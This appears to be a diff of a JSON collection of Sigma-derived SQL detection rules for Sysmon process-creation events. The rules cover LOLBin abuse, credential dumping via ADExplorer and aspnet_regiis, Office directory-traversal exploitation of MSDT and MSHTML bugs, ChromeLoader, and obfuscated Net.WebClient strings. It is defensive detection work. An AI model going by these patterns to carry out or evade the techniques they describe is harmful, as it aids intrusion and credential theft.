- { - "title": "Microsoft Workflow Compiler Execution", - "id": "419dbf2b-8a9b-4bea-bf99-7544b050ec8d", - "status": "test", - "description": "Detects invocation of Microsoft Workflow Compiler, which may permit the execution of arbitrary unsigned code.", - "author": "Nik Seetharaman, frack113", - "tags": [ - "attack.defense_evasion", - "attack.execution", - "attack.t1127", - "attack.t1218" - ], - "falsepositives": [ - "Legitimate MWC use (unlikely in modern enterprise environments)" - ], - "level": "medium", - "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\Microsoft.Workflow.Compiler.exe' ESCAPE '\\' OR OriginalFileName = 'Microsoft.Workflow.Compiler.exe'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%driverquery.exe' ESCAPE '\\' OR OriginalFileName = 'drvqry.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE 
'\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mshta.exe' ESCAPE '\\') OR (ParentImage LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR ParentImage LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_workflow_compiler.yml" + "filename": "proc_creation_win_driverquery_recon.yml" }, { - "title": "Potential System Information Discovery Via Wmic.EXE", - "id": "9d5a1274-922a-49d0-87f3-8c653483b909", + "title": "Potential Exploitation Attempt From Office Application", + "id": "868955d9-697e-45d4-a3da-360cefd7c216", "status": "experimental", - "description": "Detects the use of the WMI command-line (WMIC) utility to identify and display various system information,\nincluding OS, CPU, GPU, and disk drive names; memory capacity; display resolution; and baseboard, BIOS,\nand GPU driver products/versions.\nSome of these commands were used by Aurora Stealer in late 2022/early 2023.\n", - "author": "TropChaud", + "description": "Detects Office applications executing a child process that includes directory traversal patterns. 
This could be an attempt to exploit CVE-2022-30190 (MSDT RCE) or CVE-2021-40444 (MSHTML RCE)", + "author": "Christian Burkard (Nextron Systems), @SBousseaden (idea)", "tags": [ - "attack.discovery", - "attack.t1082" + "attack.execution", + "attack.defense_evasion" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Description = 'WMI Commandline Utility' OR OriginalFileName = 'wmic.exe' OR Image LIKE '%\\\\WMIC.exe' ESCAPE '\\') AND (CommandLine LIKE '%cpu get name%' ESCAPE '\\' OR CommandLine LIKE '%MEMPHYSICAL get MaxCapacity%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get product%' ESCAPE '\\' OR CommandLine LIKE '%baseboard get version%' ESCAPE '\\' OR CommandLine LIKE '%bios get SMBIOSBIOSVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get name%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get DriverVersion%' ESCAPE '\\' OR CommandLine LIKE '%path win32\\_VideoController get VideoModeDescription%' ESCAPE '\\' OR CommandLine LIKE '%OS get Caption,OSArchitecture,Version%' ESCAPE '\\' OR CommandLine LIKE '%DISKDRIVE get Caption%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (ParentImage LIKE '%\\\\winword.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\excel.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powerpnt.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\msaccess.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\mspub.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\eqnedt32.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\visio.exe' ESCAPE '\\') AND (CommandLine LIKE '%../../../..%' ESCAPE '\\' OR CommandLine LIKE '%..\\\\..\\\\..\\\\..%' ESCAPE '\\' OR CommandLine LIKE '%..//..//..//..%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_wmic_recon_system_info_discovery.yml" + "filename": 
"proc_creation_win_exploit_cve_2021_40444_office_directory_traversal.yml" }, { - "title": "Winrar Execution in Non-Standard Folder", - "id": "4ede543c-e098-43d9-a28f-dd784a13132f", - "status": "test", - "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", - "author": "Florian Roth (Nextron Systems), Tigzy", + "title": "Powershell ChromeLoader Browser Hijacker", + "id": "27ba3207-dd30-4812-abbf-5d20c57d474e", + "status": "experimental", + "description": "Detects PowerShell process spawning a 'chrome.exe' process with the 'load-extension' flag to start a new chrome instance with custom extensions, as seen being used in 'ChromeLoader'", + "author": "Aedan Russell, frack113 (sigma)", "tags": [ - "attack.collection", - "attack.t1560.001" + "attack.persistence", + "attack.t1176" ], "falsepositives": [ - "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\rar.exe' ESCAPE '\\' OR Image LIKE '%\\\\winrar.exe' ESCAPE '\\') OR Description = 'Command line RAR') AND NOT ((Image LIKE '%\\\\WinRAR%' ESCAPE '\\' OR Image LIKE '%C:\\\\Windows\\\\Temp%' ESCAPE '\\' OR Image LIKE '%\\\\UnRAR.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\chrome.exe' ESCAPE '\\' AND (ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\') AND CommandLine LIKE '%--load-extension=%' ESCAPE '\\' AND CommandLine LIKE '%\\\\AppData\\\\Local\\\\%' ESCAPE '\\')" ], - "filename": "proc_creation_win_winrar_execution.yml" + "filename": "proc_creation_win_browsers_chrome_load_extension.yml" }, { - "title": "Python Spawning Pretty TTY on Windows", - "id": "480e7e51-e797-47e3-8d72-ebfce65b6d8d", + "title": "Suspicious Active Directory 
Database Snapshot Via ADExplorer", + "id": "ef61af62-bc74-4f58-b49b-626448227652", "status": "experimental", - "description": "Detects python spawning a pretty tty", - "author": "Nextron Systems", + "description": "Detects the execution of Sysinternals ADExplorer with the \"-snapshot\" flag in order to save a local copy of the active directory database to a suspicious directory.", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1059" + "attack.credential_access", + "attack.t1552.001", + "attack.t1003.003" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%python.exe' ESCAPE '\\' OR Image LIKE '%python3.exe' ESCAPE '\\' OR Image LIKE '%python2.exe' ESCAPE '\\') AND ((CommandLine LIKE '%import pty%' ESCAPE '\\' AND CommandLine LIKE '%.spawn(%' ESCAPE '\\') OR CommandLine LIKE '%from pty import spawn%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\ADExplorer.exe' ESCAPE '\\' OR OriginalFileName = 'AdExp') AND CommandLine LIKE '%snapshot%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\Downloads\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\AppData\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Windows\\\\Temp\\\\%' ESCAPE '\\'))" ], - "filename": "proc_creation_win_python_pty_spawn.yml" + "filename": "proc_creation_win_sysinternals_adexplorer_susp_execution.yml" }, { - "title": "Finger.exe Suspicious Invocation", - "id": "af491bca-e752-4b44-9c86-df5680533dbc", + "title": "PUA - Advanced IP Scanner Execution", + "id": "bef37fa2-f205-4a7b-b484-0759bfd5f86f", "status": "experimental", - "description": "Detects suspicious aged finger.exe tool execution often used in malware attacks nowadays", - "author": "Florian Roth (Nextron Systems), omkar72, 
oscd.community", + "description": "Detects the use of Advanced IP Scanner. Seems to be a popular tool for ransomware groups.", + "author": "Nasreddine Bencherchali (Nextron Systems), @ROxPinTeddy", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.discovery", + "attack.t1046", + "attack.t1135" ], "falsepositives": [ - "Admin activity (unclear what they do nowadays with finger.exe)" + "Legitimate administrative use" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'finger.exe' OR Image LIKE '%\\\\finger.exe' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\advanced\\_ip\\_scanner%' ESCAPE '\\' OR OriginalFileName LIKE '%advanced\\_ip\\_scanner%' ESCAPE '\\' OR Description LIKE '%Advanced IP Scanner%' ESCAPE '\\') OR (CommandLine LIKE '%/portable%' ESCAPE '\\' AND CommandLine LIKE '%/lng%' ESCAPE '\\')))" ], - "filename": "proc_creation_win_finger_usage.yml" + "filename": "proc_creation_win_pua_advanced_ip_scanner.yml" }, { - "title": "Detected Windows Software Discovery", - "id": "e13f668e-7f95-443d-98d2-1816a7648a7b", + "title": "SQL Client Tools PowerShell Session Detection", + "id": "a746c9b8-a2fb-4ee5-a428-92bee9e99060", "status": "test", - "description": "Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable.", - "author": "Nikita Nazarov, oscd.community", + "description": "This rule detects execution of a PowerShell code through the sqltoolsps.exe utility, which is included in the standard set of utilities supplied with the Microsoft SQL Server Management studio.\nScript blocks are not logged in this case, so this utility helps to bypass protection mechanisms based on the analysis of 
these logs.\n", + "author": "Agro (@agro_sev) oscd.communitly", "tags": [ - "attack.discovery", - "attack.t1518" + "attack.execution", + "attack.t1059.001", + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Legitimate administration activities" + "Direct PS command execution through SQLToolsPS.exe is uncommon, childprocess sqltoolsps.exe spawned by smss.exe is a legitimate action." ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\reg.exe' ESCAPE '\\' AND CommandLine LIKE '%query%' ESCAPE '\\' AND CommandLine LIKE '%\\\\software\\\\%' ESCAPE '\\' AND CommandLine LIKE '%/v%' ESCAPE '\\' AND CommandLine LIKE '%svcversion%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\sqltoolsps.exe' ESCAPE '\\' OR OriginalFileName LIKE '\\\\sqltoolsps.exe' ESCAPE '\\') AND NOT (ParentImage LIKE '%\\\\smss.exe' ESCAPE '\\'))" ], - "filename": "proc_creation_win_reg_software_discovery.yml" + "filename": "proc_creation_win_mssql_sqltoolsps_susp_execution.yml" }, { - "title": "Arbitrary Binary Execution Using GUP Utility", - "id": "d65aee4d-2292-4cea-b832-83accd6cfa43", + "title": "Use of VSIISExeLauncher.exe", + "id": "18749301-f1c5-4efc-a4c3-276ff1f5b6f8", "status": "experimental", - "description": "Detects execution of the Notepad++ updater (gup) to launch other commands or executables", + "description": "The \"VSIISExeLauncher.exe\" binary part of the Visual Studio/VS Code can be used to execute arbitrary binaries", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution" + "attack.defense_evasion", + "attack.t1127" ], "falsepositives": [ - "Other parent binaries using GUP not currently identified" + "Unknown" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel 
= 'Microsoft-Windows-Sysmon/Operational') AND (ParentImage LIKE '%\\\\gup.exe' ESCAPE '\\' AND Image LIKE '%\\\\explorer.exe' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\explorer.exe' ESCAPE '\\' AND CommandLine LIKE '%\\\\Notepad++\\\\notepad++.exe%' ESCAPE '\\') OR (ParentImage LIKE '%\\\\Notepad++\\\\updater\\\\%' ESCAPE '\\') OR (CommandLine = '')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\VSIISExeLauncher.exe' ESCAPE '\\' OR OriginalFileName = 'VSIISExeLauncher.exe') AND (CommandLine LIKE '% -p %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\'))" ], - "filename": "proc_creation_win_gup_arbitrary_binary_execution.yml" + "filename": "proc_creation_win_lolbin_vsiisexelauncher.yml" }, { - "title": "Invoke-Obfuscation Via Use MSHTA", - "id": "ac20ae82-8758-4f38-958e-b44a3140ca88", - "status": "test", - "description": "Detects Obfuscated Powershell via use MSHTA in Scripts", - "author": "Nikita Nazarov, oscd.community", - "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" - ], + "title": "Suspicious Windows Update Agent Empty Cmdline", + "id": "52d097e2-063e-4c9c-8fbb-855c8948d135", + "status": "experimental", + "description": "Detects suspicious Windows Update Agent activity in which a wuauclt.exe process command line doesn't contain any command line flags", + "author": "Florian Roth (Nextron Systems)", "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%set%' ESCAPE '\\' AND CommandLine LIKE '%&&%' ESCAPE '\\' AND CommandLine LIKE '%mshta%' ESCAPE '\\' AND CommandLine LIKE '%vbscript:createobject%' ESCAPE '\\' AND CommandLine LIKE '%.run%' ESCAPE '\\' AND CommandLine LIKE '%(window.close)%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image 
LIKE '%\\\\Wuauclt.exe' ESCAPE '\\' OR OriginalFileName = 'Wuauclt.exe') AND CommandLine LIKE '%\\\\Wuauclt.exe' ESCAPE '\\')" ], - "filename": "proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml" + "filename": "proc_creation_win_wuauclt_no_cli_flags_execution.yml" }, { - "title": "SyncAppvPublishingServer VBS Execute Arbitrary PowerShell Code", - "id": "36475a7d-0f6d-4dce-9b01-6aeb473bbaf1", + "title": "Potential Suspicious Mofcomp Execution", + "id": "1dd05363-104e-4b4a-b963-196a534b03a1", "status": "experimental", - "description": "Executes arbitrary PowerShell code using SyncAppvPublishingServer.vbs", - "author": "frack113", + "description": "Detects execution of the \"mofcomp\" utility as a child of a suspicious shell or script running utility or by having a supsicious path in the commandline.\nThe \"mofcomp\" utility parses a file containing MOF statements and adds the classes and class instances defined in the file to the WMI repository.\nAttackers abuse this utility to install malicious MOF scripts\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1218", - "attack.t1216" + "attack.execution", + "attack.t1218" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND CommandLine LIKE '%\\\\SyncAppvPublishingServer.vbs%' ESCAPE '\\' AND CommandLine LIKE '%;%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Image LIKE '%\\\\mofcomp.exe' ESCAPE '\\' OR OriginalFileName = 'mofcomp.exe') AND ((ParentImage LIKE '%\\\\cmd.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\powershell.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\pwsh.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wsl.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\wscript.exe' ESCAPE '\\' OR ParentImage LIKE '%\\\\cscript.exe' ESCAPE '\\') OR (CommandLine 
LIKE '%\\\\AppData\\\\Local\\\\Temp%' ESCAPE '\\' OR CommandLine LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\\\WINDOWS\\\\Temp\\\\%' ESCAPE '\\' OR CommandLine LIKE '%\\%temp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%tmp\\%%' ESCAPE '\\' OR CommandLine LIKE '%\\%appdata\\%%' ESCAPE '\\'))) AND NOT ((ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\wbem\\\\WmiPrvSE.exe' ESCAPE '\\' AND CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\'))) AND NOT ((CommandLine LIKE '%C:\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' AND CommandLine LIKE '%.mof' ESCAPE '\\')))" ], - "filename": "proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml" + "filename": "proc_creation_win_mofcomp_execution.yml" }, { - "title": "Sysinternals PsService Execution", - "id": "3371f518-5fe3-4cf6-a14b-2a0ae3fd8a4f", - "status": "experimental", - "description": "Detects usage of Sysinternals PsService which can be abused for service reconnaissance and tampering", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Malicious PE Execution by Microsoft Visual Studio Debugger", + "id": "15c7904e-6ad1-4a45-9b46-5fb25df37fd2", + "status": "test", + "description": "There is an option for a MS VS Just-In-Time Debugger \"vsjitdebugger.exe\" to launch specified executable and attach a debugger.\nThis option may be used adversaries to execute malicious code by signed verified binary.\nThe debugger is installed alongside with Microsoft Visual Studio package.\n", + "author": "Agro (@agro_sev), Ensar Şamil (@sblmsrsn), oscd.community", "tags": [ - "attack.discovery", - "attack.persistence", - "attack.t1543.003" + "attack.t1218", + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of PsService by an administrator" + "The process spawned by vsjitdebugger.exe is uncommon." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (OriginalFileName = 'psservice.exe' OR (Image LIKE '%\\\\PsService.exe' ESCAPE '\\' OR Image LIKE '%\\\\PsService64.exe' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ParentImage LIKE '%\\\\vsjitdebugger.exe' ESCAPE '\\' AND NOT ((Image LIKE '%\\\\vsimmersiveactivatehelper%.exe' ESCAPE '\\' OR Image LIKE '%\\\\devenv.exe' ESCAPE '\\')))" ], - "filename": "proc_creation_win_sysinternals_psservice.yml" + "filename": "proc_creation_win_susp_use_of_vsjitdebugger_bin.yml" }, { - "title": "Defrag Deactivation", - "id": "958d81aa-8566-4cea-a565-59ccd4df27b0", + "title": "Audio Capture via SoundRecorder", + "id": "83865853-59aa-449e-9600-74b9d89a6d6e", "status": "test", - "description": "Detects the deactivation and disabling of the Scheduled defragmentation task as seen by Slingshot APT group", - "author": "Florian Roth (Nextron Systems), Bartlomiej Czyz (@bczyz1)", + "description": "Detect attacker collecting audio via SoundRecorder application.", + "author": "E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community", "tags": [ - "attack.persistence", - "attack.t1053.005", - "attack.s0111" + "attack.collection", + "attack.t1123" ], "falsepositives": [ - "Unknown" + "Legitimate audio capture by legitimate user." 
], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\schtasks.exe' ESCAPE '\\' AND (CommandLine LIKE '%/delete%' ESCAPE '\\' OR CommandLine LIKE '%/change%' ESCAPE '\\') AND CommandLine LIKE '%/TN%' ESCAPE '\\' AND CommandLine LIKE '%\\\\Microsoft\\\\Windows\\\\Defrag\\\\ScheduledDefrag%' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\SoundRecorder.exe' ESCAPE '\\' AND CommandLine LIKE '%/FILE%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_slingshot.yml" + "filename": "proc_creation_win_soundrecorder_audio_capture.yml" }, { - "title": "Microsoft IIS Connection Strings Decryption", - "id": "97dbf6e2-e436-44d8-abee-4261b24d3e41", - "status": "experimental", - "description": "Detects use of aspnet_regiis to decrypt Microsoft IIS connection strings. An attacker with Microsoft IIS web server access via a webshell or alike can decrypt and dump any hardcoded connection strings, such as the MSSQL service account password using aspnet_regiis command.", - "author": "Tim Rauch", + "title": "Imports Registry Key From a File", + "id": "73bba97f-a82d-42ce-b315-9182e76c57b1", + "status": "test", + "description": "Detects the import of the specified file to the registry with regedit.exe.", + "author": "Oddvar Moe, Sander Wiebing, oscd.community", "tags": [ - "attack.credential_access", - "attack.t1003" + "attack.t1112", + "attack.defense_evasion" ], "falsepositives": [ - "Unknown" + "Legitimate import of keys", + "Evernote" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\aspnet\\_regiis.exe' ESCAPE '\\' OR OriginalFileName LIKE 'aspnet\\_regiis.exe' ESCAPE '\\') AND (CommandLine LIKE '%connectionStrings%' ESCAPE '\\' AND CommandLine LIKE '% -pdf%' ESCAPE '\\'))" + "SELECT 
* FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\regedit.exe' ESCAPE '\\' OR OriginalFileName = 'REGEDIT.EXE') AND (CommandLine LIKE '% /i %' ESCAPE '\\' OR CommandLine LIKE '% /s %' ESCAPE '\\' OR CommandLine LIKE '%.reg%' ESCAPE '\\')) AND NOT (((CommandLine LIKE '% /e %' ESCAPE '\\' OR CommandLine LIKE '% /a %' ESCAPE '\\' OR CommandLine LIKE '% /c %' ESCAPE '\\' OR CommandLine LIKE '% -e %' ESCAPE '\\' OR CommandLine LIKE '% -a %' ESCAPE '\\' OR CommandLine LIKE '% -c %' ESCAPE '\\')) AND (CommandLine REGEXP ':[^ \\\\]')))" ], - "filename": "proc_creation_win_iis_connection_strings_decryption.yml" + "filename": "proc_creation_win_regedit_import_keys.yml" }, { - "title": "APT31 Judgement Panda Activity", - "id": "03e2746e-2b31-42f1-ab7a-eb39365b2422", - "status": "test", - "description": "Detects APT31 Judgement Panda activity as described in the Crowdstrike 2019 Global Threat Report", + "title": "Potential CVE-2022-26809 Exploitation Attempt", + "id": "a7cd7306-df8b-4398-b711-6f3e4935cf16", + "status": "experimental", + "description": "Detects suspicious remote procedure call (RPC) service anomalies based on the spawned sub processes (long shot to detect the exploitation of vulnerabilities like CVE-2022-26809)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.lateral_movement", - "attack.credential_access", - "attack.g0128", - "attack.t1003.001", - "attack.t1560.001" + "attack.initial_access", + "attack.t1190", + "attack.execution", + "attack.t1569.002" ], "falsepositives": [ - "Unlikely" + "Unknown", + "Some cases in which the service spawned a werfault.exe process" ], - "level": "critical", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((CommandLine LIKE '%ldifde%' ESCAPE '\\' AND CommandLine LIKE '%-f -n%' ESCAPE '\\' AND CommandLine LIKE '%eprod.ldf%' ESCAPE '\\') OR (CommandLine LIKE '%copy 
\\\\\\\\\\*' ESCAPE '\\' AND CommandLine LIKE '%c$%' ESCAPE '\\' AND (CommandLine LIKE '%\\\\aaaa\\\\procdump64.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\netsess.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\aaaa\\\\7za.exe%' ESCAPE '\\' OR CommandLine LIKE '%\\\\c$\\\\aaaa\\\\%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE 'C:\\\\Windows\\\\System32\\\\svchost.exe' ESCAPE '\\' AND ParentCommandLine LIKE '%-k RPCSS%' ESCAPE '\\')" ], - "filename": "proc_creation_win_apt_apt31_judgement_panda.yml" + "filename": "proc_creation_win_exploit_cve_2022_26809_rpcss_child_process_anomaly.yml" }, { - "title": "CMSTP Execution Process Creation", - "id": "7d4cdc5a-0076-40ca-aac8-f7e714570e47", - "status": "stable", - "description": "Detects various indicators of Microsoft Connection Manager Profile Installer execution", - "author": "Nik Seetharaman", + "title": "Net WebClient Casing Anomalies", + "id": "c86133ad-4725-4bd0-8170-210788e0a7ba", + "status": "experimental", + "description": "Detects PowerShell command line contents that include a suspicious abnormal casing in the Net.Webclient (e.g. 
nEt.WEbCliEnT) string as used in obfuscation techniques", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", "attack.execution", - "attack.t1218.003", - "attack.g0069", - "car.2019-04-001" + "attack.t1059.001" ], "falsepositives": [ - "Legitimate CMSTP use (unlikely in modern enterprise environments)" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND ParentImage LIKE '%\\\\cmstp.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '1' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Image LIKE '%\\\\powershell.exe' ESCAPE '\\' OR Image LIKE '%\\\\pwsh.exe' ESCAPE '\\') OR OriginalFileName IN ('PowerShell.EXE', 'pwsh.dll')) AND (CommandLine LIKE '%TgBlAFQALgB3AEUAQg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBFAEIA%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcARQBCA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgB3AGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AdwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAHcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine 
LIKE '%TgBFAHQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAFQALgBXAGUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQBUAC4AVwBlAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAVAAuAFcAZQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4AZQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBlAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAGUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%bgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%4ARQB0AC4AdwBFAGIA%' ESCAPE '\\' OR CommandLine LIKE '%uAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine LIKE '%TgBFAHQALgB3AEUAYg%' ESCAPE '\\' OR CommandLine LIKE '%OAEUAdAAuAHcARQBiA%' ESCAPE '\\' OR CommandLine 